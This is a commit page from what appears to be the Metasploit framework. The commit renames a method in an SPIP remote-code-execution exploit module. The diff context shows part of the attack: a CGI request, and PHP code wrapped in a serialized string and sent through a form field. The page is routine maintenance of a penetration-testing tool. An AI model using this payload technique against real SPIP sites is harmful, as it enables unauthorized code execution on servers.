Skip to content

Commit b8a1d40

Browse files
committed
Rename execute_command to send_payload in line with its actual function (avoiding confusion with cmdstager)
1 parent 8024533 commit b8a1d40

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/multi/http/spip_rce_form.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -96,7 +96,7 @@ def check
9696
return Exploit::CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")
9797
end
9898

99-
def execute_command(cmd, args = {})
99+
def send_payload(cmd, args = {})
100100
send_request_cgi(
101101
{
102102
'uri' => args['uri'],
@@ -143,6 +143,6 @@ def exploit
143143
final_payload = "<?php #{phped_payload} ?>"
144144
oubli = "s:#{final_payload.length}:\"#{final_payload}\";"
145145

146-
execute_command(oubli, { 'uri' => uri, 'csrf' => csrf })
146+
send_payload(oubli, { 'uri' => uri, 'csrf' => csrf })
147147
end
148148
end

0 commit comments

Comments
 (0)